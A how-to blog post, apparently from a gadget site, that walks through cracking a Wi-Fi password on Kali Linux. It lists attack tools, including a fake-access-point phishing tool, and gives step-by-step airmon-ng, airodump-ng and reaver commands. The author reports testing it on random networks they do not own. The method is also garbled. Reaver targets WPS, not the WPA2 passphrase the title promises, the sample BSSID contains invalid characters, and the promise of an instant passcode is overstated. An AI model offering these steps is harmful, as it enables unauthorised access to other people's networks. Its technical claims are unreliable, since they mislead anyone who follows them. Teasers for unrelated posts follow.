Skip to main content
How To TutorialsHow To Hack WPA2-PSK Secured Wi-Fi Password Using Kali Linux
we will learn how to use Wi-Fi cracking tools that Kali Linux has incorporated. However, it is important that the wireless card that you has a support monitoring mode.


Fern Wifi Cracker
Fern Wifi cracker is one of the tools that Kali has to crack wireless.

Kismet
Kismet is a WIFI network analyzing tool. It is a 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system. It will work with any wireless card that supports raw monitoring (rfmon) mode, and can sniff 802.11a/b/g/n traffic. It identifies the networks by collecting packets and also hidden networks.

GISKismet
GISKismet is a wireless visualization tool to represent data gathered using Kismet in a practical way. GISKismet stores the information in a database so we can query data and generate graphs using SQL. GISKismet currently uses SQLite for the database and GoogleEarth / KML files for graphing.

Ghost Phisher
Ghost Phisher is a popular tool that helps to create fake wireless access points and then later to create Man-in-The-Middle-Attack.


Wifite
It is another wireless clacking tool, which attacks multiple WEP, WPA, and WPS encrypted networks in a row.
Today I want to explain onlyone tool of kali linux.


1 Year Ago
WPA2-PSK may not be as safe as you think. There are a few attacks against WAP2-PSK. One of the most common attacks is against WPA2 is exploiting a weak passphrase. Below you will find a few easy steps on how to break WPA2 with a weak passphrase.
Wifi Hacking, nowadays, is not something which is the exclusive domain of the “experts”. Nowadays with some knowledge and practice, you can also do wifi hacking easily. In our previous tutorial, we had shown you cracking a WiFi network which is secured with WPS security but this tutorial is a bit different, in this tutorial we are going to explain to you that How to hack secured wifi with WPA2-PSK using kali linux. Do Tell us your queries in the comment Box.


This hack may or may does not work on some Wifi network, We have personally tested this on some random Wifi networks and it works Fine for us.
Things You Need:-
Laptop/PC with Wifi and Kali Linux Installed

Step 1: Open Terminal in Kali Linux. The first thing that you need to do is to find out the name of your of your wireless adapter, Just type ifconfig on the terminal and hit enter. Here in my case, wlan0 is my Wireless adapter.

Step 2: Now type airmon-ng check kill and hit enter and then type airmon-ng check and then hit enter

Step 3: Enable Monitor mode. Now, we are going to use a tool called airmon-ng to create a virtual interface called mon. Just type airmon-ng start wlan0 and hit enter.

Step 4: Now we have to start capturing packets and to do this we will use airodump-ng. Type airodump-ng wlan0mon and hit enter and after that, You’ll able to see the name of the wifi networks.



Step 5: Suppose I want to hack the Wifi Bond_007 all I have to do is just copy the BSSID of the network. Just Select the BSSID and then Press Ctrl+C


Step 6: Now write the command reaver –i wlan0mon -b (BSSID that you had copied) -vv -K 1 and then Hit enter. Voila, You got the passcode.

e.g: reaver -i wlan0mon -b B0:5G:54:96:G7:70 -vv -K 1

Every Tutorial in Gadgetsay is for educational purpose, We are not responsible for any Loss.
Readmore

Comments

Popular posts from this blog

40 easy ways to make money quickly

On this page you'll find all the best ways to make money in your spare time whilst at university based on our own experience. We'll keep adding new ways to this page so go ahead and bookmark it. And please do share your own ideas in the comments! Top ways to make money online and offline No-risk matched betting Hands down the quickest way to make a  lot  of money (well, without breaking the law). Lots of students have genuinely made £100s from this technique. It's completely legal, risk free, tax free, and anyone can do it. It works by taking advantage of free bets regularly offered by betting sites through ‘matching' them at a betting exchange. Matched betting eliminates the risk (you are betting both  for  and  against  a certain outcome). This leaves you being able to squeeze out the free bet, which can be as much as £200! Multiply this by how many betting sites there are and you can quite easily come away with a profit of a few hundred poun...

How to write report in ethical hacking?

……..continue of report writing …….. 4. Correct spelling and grammar is important too. A misspelled word leaves a very negative impact upon the person who is reading your report. So, you should make sure that you proofread your report and perform spell-checks before submitting it to the client. 5. Always make sure that you use a consistent voice and style in writing a report. Changing the voice would create confusion in the reader; so you should choose one voice and style and stick to it throughout your report. 6. Make sure you spend time on eliminating false-positives (vulnerabilities that are actually not present), because false-negatives will always be there no matter what you do. Eliminating the false-positives would enhance the credibility of the report. 7. Perform a detailed analysis of the vulnerability to find out its root cause. A screenshot of a RAW http request or the screenshot that demonstrates the evidence of the finding would give a clear picture to the developer of the st...